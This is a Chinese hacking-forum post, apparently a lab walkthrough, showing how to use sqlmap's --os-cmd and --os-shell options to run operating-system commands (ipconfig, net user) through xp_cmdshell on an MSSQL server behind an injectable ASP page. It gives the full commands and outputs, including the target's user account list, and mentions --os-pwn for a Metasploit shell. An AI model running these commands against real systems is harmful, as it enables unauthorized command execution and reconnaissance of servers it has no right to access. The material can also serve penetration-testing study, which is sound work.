切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
276 SQLMAP shell — Windows[复制链接]
发表于 2012-9-28 23:56:49 | 显示全部楼层 |!read_mode!

打开MSSQL

OS-CMD
  1. root@Dis9Team:~# sqlmap -u http://5.5.5.3/get.asp?id=1 --os-cmd=ipconfig
  2. [21:14:35] [INFO] testing if xp_cmdshell extended procedure is usable
  3. [21:14:35] [INFO] the SQL query used returns 2 entries
  4. [21:14:35] [INFO] retrieved: " "
  5. [21:14:35] [INFO] retrieved: "1"
  6. [21:14:35] [INFO] xp_cmdshell extended procedure is usable                                                                  
  7. do you want to retrieve the command standard output? [Y/n/a] Y
  8. [21:14:37] [INFO] the SQL query used returns 11 entries
  9. [21:14:37] [INFO] retrieved: "   Connection-specific DNS Suffix  . : \\r"
  10. [21:14:37] [INFO] retrieved: "   Connection-specific DNS Suffix  . : \\r"
  11. [21:14:37] [INFO] retrieved: "   Default Gateway . . . . . . . . . : \\r"
  12. [21:14:37] [INFO] retrieved: "   IP Address. . . . . . . . . . . . : 5.5.5.3\\r"
  13. [21:14:37] [INFO] retrieved: "   Subnet Mask . . . . . . . . . . . : 255.0.0.0\\r"
  14. [21:14:37] [INFO] retrieved: "\\r"
  15. [21:14:37] [INFO] heuristics detected web page charset 'GB2312'
  16. [21:14:37] [INFO] retrieved: "Ethernet adapter 本地连接:\\r"
  17. [21:14:37] [INFO] retrieved: "Ethernet adapter 本地连接:\\r"
  18. [21:14:37] [INFO] retrieved: "Ethernet adapter 本地连接:\\r"
  19. [21:14:37] [INFO] retrieved: "Ethernet adapter 本地连接:\\r"
  20. [21:14:37] [INFO] retrieved: "Windows IP Configuration\\r"
  21. command standard output:                                                                                                   
  22. ---
  23.    Connection-specific DNS Suffix  . :
  24.    Connection-specific DNS Suffix  . :
  25.    Default Gateway . . . . . . . . . :
  26.    IP Address. . . . . . . . . . . . : 5.5.5.3
  27.    Subnet Mask . . . . . . . . . . . : 255.0.0.0

  28. Ethernet adapter 本地连接:
  29. Ethernet adapter 本地连接:
  30. Ethernet adapter 本地连接:
  31. Ethernet adapter 本地连接:
  32. Windows IP Configuration
  33. ---
  34. [21:14:37] [INFO] cleaning up the database management system
  35. [21:14:37] [INFO] fetched data logged to text files under '/pen/sql/sqlmap/output/5.5.5.3'

  36. [*] shutting down at 21:14:37
复制代码

–os-shell

用xp_cmdshell执行

  1. root@Dis9Team:~# sqlmap -u http://5.5.5.3/get.asp?id=1 --os-shell
  2. os-shell> net user
  3. do you want to retrieve the command standard output? [Y/n/a] Y
  4. [21:15:10] [INFO] the SQL query used returns 9 entries
  5. [21:15:10] [INFO] retrieved: " "
  6. [21:15:10] [INFO] retrieved: "-------------------------------------------------------------------------------"
  7. [21:15:10] [INFO] retrieved: "-------------------------------------------------------------------------------"
  8. [21:15:10] [INFO] retrieved: "-------------------------------------------------------------------------------"
  9. [21:15:10] [INFO] retrieved: "-------------------------------------------------------------------------------"
  10. [21:15:10] [INFO] heuristics detected web page charset 'GB2312'
  11. [21:15:10] [INFO] retrieved: "\\\\\\\\ 的用户帐户"
  12. [21:15:10] [INFO] retrieved: "Administrator            ASPNET                   Guest                    "
  13. [21:15:10] [INFO] retrieved: "IUSR_123456-E3952276     IWAM_123456-E3952276     SUPPORT_388945a0         "
  14. [21:15:10] [INFO] retrieved: "命令运行完毕,但发生一个或多个错误。"
  15. command standard output:                                                                                                   
  16. ---
  17. -------------------------------------------------------------------------------
  18. -------------------------------------------------------------------------------
  19. -------------------------------------------------------------------------------
  20. -------------------------------------------------------------------------------
  21. \\ 的用户帐户
  22. Administrator            ASPNET                   Guest                    
  23. IUSR_123456-E3952276     IWAM_123456-E3952276     SUPPORT_388945a0         
  24. 命令运行完毕,但发生一个或多个错误。
复制代码

–os-pwn

用MSF SHELL 不稳定



操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-31 01:11

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部